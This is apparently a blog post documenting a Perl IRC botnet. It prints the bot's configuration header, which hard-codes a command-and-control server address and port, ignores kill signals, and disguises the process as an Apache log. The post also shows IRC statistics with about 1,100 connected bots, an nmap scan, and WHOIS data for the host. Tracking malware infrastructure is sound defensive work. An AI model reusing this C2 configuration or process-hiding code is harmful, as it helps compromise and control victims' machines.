Pages

Tuesday, October 7, 2014

1k Perl Bot - 94.102.63.238 - 

 // botnet soruce ( for Full source comment ) 
my $linas_max='2';
my $sleep='5';
my @adms=("X", "Y");
my @hostauth=("localhost");
my @canais=("#new");
my $nick='PHP';
my $ircname ='PHP';
chop (my $realname = `uname -sr`);
$servidor='94.102.63.238' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="'/usr/sbin/apache/log'�"x16;


 * Connecting to 94.102.63.238 port 443...
* There are 1 users and 1097 invisible on 1 servers
* 1 :operator(s) online
* 25 :unknown connection(s)
* 5 :channels formed
* I have 1098 clients and 0 servers
* 1098 4012 :Current local users 1098, max 4012
* 1098 1112 :Current global users 1098, max 1112


 * Nmap scan report for hosted-for-minecraft.net (94.102.63.238)
Host is up (0.071s latency).
Not shown: 995 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 5.9p1 Debian 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:c1:7e:70:09:2d:c2:41:fa:67:f4:2a:7e:50:1a:f0 (DSA)
|   2048 8c:d7:ca:73:31:c3:47:b3:54:70:27:be:ec:5c:70:91 (RSA)
|_  256 58:d3:27:7a:7b:1a:1b:56:8c:2a:07:42:e1:24:91:90 (ECDSA)
25/tcp  filtered smtp
80/tcp  open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
135/tcp filtered msrpc
443/tcp open     irc     Unreal ircd
| irc-info: 
|   server: irc.foonet.com
|   version: Unreal3.2.10.1. irc.foonet.com 
|   servers: 1
|   ops: 1
|   chans: 5
|   users: 1100
|   lservers: 0
|   lusers: 1100
|   uptime: 0 days, 18:06:24
|   source host: 7DE75DA1.C67917B8.7CED0DBF.IP
|_  source ident: nmap
Service Info: Host: irc.foonet.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel



NetRange:       94.0.0.0 - 94.255.255.255
CIDR:           94.0.0.0/8
OriginAS:       
NetName:        94-RIPE
NetHandle:      NET-94-0-0-0-1
Parent:         
NetType:        Allocated to RIPE NCC
Comment:        These addresses have been further assigned to users in
Comment:        the RIPE NCC region. Contact information can be found in
Comment:        the RIPE database at http://www.ripe.net/whois
RegDate:        2007-07-30
Updated:        2009-05-18
Ref:            http://whois.arin.net/rest/net/NET-94-0-0-0-1

OrgName:        RIPE Network Coordination Centre
OrgId:          RIPE
Address:        P.O. Box 10096
City:           Amsterdam
StateProv:      
PostalCode:     1001EB
Country:        NL
RegDate:        
Updated:        2013-07-29
Ref:            http://whois.arin.net/rest/org/RIPE

ReferralServer: whois://whois.ripe.net:43

OrgTechHandle: RNO29-ARIN
OrgTechName:   RIPE NCC Operations
OrgTechPhone:  +31 20 535 4444 
OrgTechEmail:  hostmaster@ripe.net
OrgTechRef:    http://whois.arin.net/rest/poc/RNO29-ARIN

OrgAbuseHandle: ABUSE3850-ARIN
OrgAbuseName:   Abuse Contact
OrgAbusePhone:  +31205354444 
OrgAbuseEmail:  abuse@ripe.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE3850-ARIN
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)